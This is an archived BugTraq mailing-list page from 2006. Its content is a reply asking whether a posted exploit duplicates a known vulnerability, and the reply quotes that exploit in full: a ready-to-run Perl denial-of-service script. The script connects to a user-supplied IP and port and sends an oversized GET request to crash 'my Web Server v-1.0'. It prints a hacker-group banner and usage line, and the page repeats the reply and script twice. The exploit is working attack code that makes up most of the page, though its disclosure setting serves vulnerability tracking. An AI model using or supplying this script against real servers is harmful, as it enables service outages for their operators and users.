BugTraq
Back to list
|
Post reply
my Web Server << v-1.0 Denial of Service Exploit
May 25 2006 01:35PM
s3rv3r_hack3r yahoo com
(1 replies)
Re: my Web Server << v-1.0 Denial of Service Exploit
May 26 2006 07:09PM
str0ke (str0ke milw0rm com)
Is this the same vulnerability?
http://www.securityfocus.com/bid/5954
On 25 May 2006 13:35:13 -0000, s3rv3r_hack3r (at) yahoo (dot) com [email concealed]
<s3rv3r_hack3r (at) yahoo (dot) com [email concealed]> wrote:
> #!/usr/bin/perl
>
> #my Web Server << v-1.0 Denial of Service Exploit
>
> #vendor : Eitsop.s5.com
>
> use IO::Socket;
>
> use strict;
>
>
> my($socket) = "";
>
>
>
> if($socket = IO::Socket::INET->new(
>
> PeerAddr => $ARGV[0],
>
> PeerPort => $ARGV[1],
>
> Proto => "TCP"))
>
> {
>
> print "++++++++++++++++++++++++++++++\n";
>
> print "Connecting to $ARGV[0]:$ARGV[1] ...\n";
>
> print "++++++++++++++++++++++++++++++\n";
>
> print "Exploit Send successfuly!!\n";
>
> print "++++++++++++++++++++++++++++++\n";
>
> print $socket "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\r\n\r\n";
>
> close($socket);
>
> }
>
> else
>
> {
>
> print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
> print " ___ ___ __ \n";
>
> print " / | \_____ ____ | | __ ___________________ \n";
>
> print "/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / \n";
>
> print "\ Y // __ \\ \___| <\ ___/| | \// / \n";
>
> print " \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ \n";
>
> print " \/ \/ \/ \/ \/ \/ \n";
>
> print " Iran Hackerz Security Team \n";
>
> print " WebSite's: www.hackerz.ir & www.h4ckerz.com \n";
>
> print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
> print "[Usage]perl myws.pl <IP> <Port> \n";
>
> print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
> print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1] \n";
>
> print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
> }
>
> #EoF
>
>
>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://www.securityfocus.com/bid/5954
On 25 May 2006 13:35:13 -0000, s3rv3r_hack3r (at) yahoo (dot) com [email concealed]
<s3rv3r_hack3r (at) yahoo (dot) com [email concealed]> wrote:
> #!/usr/bin/perl
>
> #my Web Server << v-1.0 Denial of Service Exploit
>
> #vendor : Eitsop.s5.com
>
> use IO::Socket;
>
> use strict;
>
>
> my($socket) = "";
>
>
>
> if($socket = IO::Socket::INET->new(
>
> PeerAddr => $ARGV[0],
>
> PeerPort => $ARGV[1],
>
> Proto => "TCP"))
>
> {
>
> print "++++++++++++++++++++++++++++++\n";
>
> print "Connecting to $ARGV[0]:$ARGV[1] ...\n";
>
> print "++++++++++++++++++++++++++++++\n";
>
> print "Exploit Send successfuly!!\n";
>
> print "++++++++++++++++++++++++++++++\n";
>
> print $socket "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\r\n\r\n";
>
> close($socket);
>
> }
>
> else
>
> {
>
> print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
> print " ___ ___ __ \n";
>
> print " / | \_____ ____ | | __ ___________________ \n";
>
> print "/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / \n";
>
> print "\ Y // __ \\ \___| <\ ___/| | \// / \n";
>
> print " \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ \n";
>
> print " \/ \/ \/ \/ \/ \/ \n";
>
> print " Iran Hackerz Security Team \n";
>
> print " WebSite's: www.hackerz.ir & www.h4ckerz.com \n";
>
> print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
> print "[Usage]perl myws.pl <IP> <Port> \n";
>
> print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
> print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1] \n";
>
> print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
> }
>
> #EoF
>
>
>
[ reply ]